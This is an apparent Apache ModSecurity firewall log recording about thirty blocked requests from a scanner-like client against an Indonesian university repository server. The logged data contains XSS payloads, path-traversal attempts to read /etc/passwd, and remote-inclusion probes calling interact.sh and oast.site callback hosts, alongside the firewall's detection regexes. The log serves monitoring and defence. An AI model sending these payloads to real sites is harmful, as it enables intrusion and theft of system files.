[Tue Aug 29 11:55:33.885309 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:query: <script>alert(document.domain);</script>=or"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/pmb/admin/convert/export_z3950.php"] [unique_id "ZO16RcCo-f0AAAq2KccAAAAE"]
[Tue Aug 29 11:55:35.640875 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:key: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php"] [unique_id "ZO16R8Co-f0AAAq4fUMAAAAJ"]
[Tue Aug 29 11:55:36.226784 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:include_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:include_file: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAApHRjUAAAAP"]
[Tue Aug 29 11:55:36.535048 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAq2Kd0AAAAE"]
[Tue Aug 29 11:55:37.964802 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/labkey/__r1/login-login.view"] [unique_id "ZO16ScCo-f0AAApbUk4AAAAh"]
[Tue Aug 29 11:55:38.040680 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;// found within ARGS:prod: ';prompt`document.domain`;//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/gsearch.php.en"] [unique_id "ZO16SsCo-f0AAApbUk8AAAAh"]
[Tue Aug 29 11:55:38.679856 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:q: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16SsCo-f0AAApbUlYAAAAh"]
[Tue Aug 29 11:55:39.686056 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:subpage: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/WebMstr7/servlet/mstrWeb"] [unique_id "ZO16S8Co-f0AAAqeFYwAAAAx"]
[Tue Aug 29 11:55:40.043619 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:svpnlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within REQUEST_COOKIES:svpnlang: <script>alert('document.domain')</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wnm/login/login.json"] [unique_id "ZO16TMCo-f0AAAqSwxIAAAAN"]
[Tue Aug 29 11:55:41.967132 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:link_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:link_url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/Ajax_url_encode.php"] [unique_id "ZO16TcCo-f0AAAqqth0AAAAA"]
[Tue Aug 29 11:55:43.734952 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:port. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:port: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/fw/syslogViewer.do"] [unique_id "ZO16T8Co-f0AAAqY6HEAAAAr"]
[Tue Aug 29 11:55:44.031843 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(1337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/sell-media-search/"] [unique_id "ZO16UMCo-f0AAApbUnsAAAAh"]
[Tue Aug 29 11:55:44.648692 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nodatamsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nodatamsg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html"] [unique_id "ZO16UMCo-f0AAAqeFakAAAAx"]
[Tue Aug 29 11:55:44.667892 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:cid: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/component/music/album.html"] [unique_id "ZO16UMCo-f0AAAqTvxQAAAAa"]
[Tue Aug 29 11:55:45.617511 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UcCo-f0AAAqTvxcAAAAa"]
[Tue Aug 29 11:55:46.598319 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16UsCo-f0AAAq@sZQAAAAM"]
[Tue Aug 29 11:55:46.664546 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/printenv.shtml"] [unique_id "ZO16UsCo-f0AAApbUoIAAAAh"]
[Tue Aug 29 11:55:46.793381 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UsCo-f0AAAqY6JIAAAAr"]
[Tue Aug 29 11:55:46.794653 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login[password]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:login[password]: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/appliance/login.ns"] [unique_id "ZO16UsCo-f0AAAq@sZsAAAAM"]
[Tue Aug 29 11:55:47.689487 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/shib_logout.php"] [unique_id "ZO16U8Co-f0AAAq-HYkAAAAT"]
[Tue Aug 29 11:55:48.563716 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/ssi/printenv.shtml"] [unique_id "ZO16VMCo-f0AAAq5@GEAAAAK"]
[Tue Aug 29 11:55:48.702939 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/ilias/shib_logout.php"] [unique_id "ZO16VMCo-f0AAAq5@GQAAAAK"]
[Tue Aug 29 11:55:51.647701 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16V8Co-f0AAApbUpQAAAAh"]
[Tue Aug 29 11:55:52.235940 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x5c\\x22 onfocus=alert(document.domain); autofocus \\x5c\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO16WMCo-f0AAAqY6LwAAAAr"]
[Tue Aug 29 11:55:52.303046 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0ots33goeuduec.oast.site found within TX:1: cjmnijtjmimvgniikdb0ots33goeuduec.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/umbraco/BackOffice/Api/Help/GetContextHelpForPage"] [unique_id "ZO16WMCo-f0AAApbUqYAAAAh"]
[Tue Aug 29 11:55:52.734264 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0kgm89ihyxmutw.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0kgm89ihyxmutw.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent"] [unique_id "ZO16WMCo-f0AAAq4fY0AAAAJ"]
[Tue Aug 29 11:55:53.602971 2023] [:error] [pid 2755] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:plugin: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/whizz/plugins/delete-plugin.php"] [unique_id "ZO16WcCo-f0AAArD6bMAAAAX"]
[Tue Aug 29 11:55:53.903255 2023] [:error] [pid 2755] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:bgColor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:bgColor: _000000\\x22onload=\\x22prompt(1)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/Telerik.ReportViewer.axd"] [unique_id "ZO16WcCo-f0AAArD6bkAAAAX"]
[Tue Aug 29 11:55:53.914373 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0ojrpzphya4oza.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0ojrpzphya4oza.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss"] [unique_id "ZO16WcCo-f0AAAq@sa0AAAAM"]
[Tue Aug 29 11:55:53.942906 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:msgId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')// found within ARGS:msgId: ';alert('document.domain')//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/carbon/admin/login.jsp"] [unique_id "ZO16WcCo-f0AAAq@sa4AAAAM"]
[Tue Aug 29 11:55:55.722825 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO16W8Co-f0AAArB1s0AAAAV"]
